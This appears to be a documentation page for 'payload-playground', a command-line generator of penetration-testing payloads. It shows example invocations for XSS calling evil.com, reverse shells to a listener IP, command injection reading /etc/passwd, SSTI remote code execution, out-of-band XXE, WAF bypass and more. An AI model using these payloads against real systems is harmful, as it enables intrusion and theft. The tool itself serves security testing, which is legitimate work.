$loading...
Generate security testing payloads from your terminal
npm install -g payload-playgroundThen use payload anywhere
npx payload-playground xssNo installation required — runs directly
# Generate an XSS payload
payload xss
# SQL injection for PostgreSQL
payload sqli -d PostgreSQL -g version
# Reverse shell
payload revshell -i 10.10.14.1 -p 4444
# List all generators
payload listxssXSSCross-Site Scripting$ payload xss -t script -s "fetch('//evil.com')" --encoding base64sqliSQLiSQL Injection$ payload sqli -d PostgreSQL -g versionrevshellReverse ShellShell one-liners$ payload revshell -i 10.10.14.1 -p 4444 -s python3 -essrfSSRFServer-Side Request Forgery$ payload ssrf -t awssstiSSTITemplate Injection$ payload ssti -e Jinja2 -t rce -c "id"lfiLFILocal File Inclusion$ payload lfi -w php-filter --depth 8xxeXXEXML External Entity$ payload xxe -t oob --oob-server http://burp.collab.net/cmdiCommand InjectionOS command injection$ payload cmdi -c "cat /etc/passwd" -s "|" -b ifsfile-uploadFile UploadMalicious file upload$ payload file-upload -s jsp -b double-extredirectOpen RedirectRedirect payloads$ payload redirect -u https://evil.com -t at-signcorsCORSCORS misconfiguration$ payload cors --target https://victim.com -t null-originnosqlNoSQL InjectionNoSQL injection$ payload nosql -t data-extraction -d MongoDBjwtJWTJWT manipulation$ payload jwt -t algorithm-confusion -s "secret123"proto-pollutionPrototype PollutionPrototype pollution$ payload proto-pollution -t constructor -p isAdmin -v truecrlfCRLF InjectionCRLF injection$ payload crlf -t response-splitting -e urlgraphqlGraphQLGraphQL attacks$ payload graphql -t deep-nesting --depth 10xpathXPath InjectionXPath injection$ payload xpath -t boolean-blind -f usernameldapLDAP InjectionLDAP injection$ payload ldap -t blind-extraction -a uidsmugglingHTTP SmugglingRequest smuggling$ payload smuggling -t te-cl --path /admincsrfCSRFCross-Site Request Forgery$ payload csrf -t fetch -u https://target.com/apiwaf-bypassWAF BypassWAF bypass techniques$ payload waf-bypass -t encoding -w cloudflareidorIDORInsecure Direct Object Ref$ payload idor -t uuid-prediction --id 1000race-conditionRace ConditionRace condition exploits$ payload race-condition -t double-spend -c 50When output is piped, the CLI outputs raw payloads without color codes — perfect for scripting and chaining with other tools.
# Save to file
payload xss -t script > payloads.txt
# Base64 encode a reverse shell
payload revshell -i 10.10.14.1 -p 4444 | base64
# Generate payloads in a loop
for engine in Jinja2 Twig FreeMarker ERB Mako; do
echo "=== $engine ==="
payload ssti -e "$engine" -t rce -c "id"
done
# Multiple XSS variants
for tag in script img svg iframe; do
payload xss -t "$tag" >> xss-payloads.txt
doneEvery generator supports --help for detailed usage:
payload xss --help
payload sqli --help
payload revshell --help-t, --tag — 9 HTML tags-e, --event — 5 event handlers-s, --script — Custom JS code--encoding — none, url, html, base64-d, --db — MySQL, PostgreSQL, MSSQL, Oracle-g, --goal — 9 attack goals-u, --union-cols — UNION column count--table, --columns — Data dump targets-i, --ip — Listener IP (required)-p, --port — Listener port (required)-s, --shell — 11 shell types-e, --encode — Base64 encoding-t, --target — AWS, GCP, Azure presets-b, --bypass — 8 bypass techniques--protocol — http, https, file, gopher, dict-h, --host / -p, --port — Custom targetsThe CLI is a pure string generator — it never executes commands, reads files, or makes network requests.
commander and chalk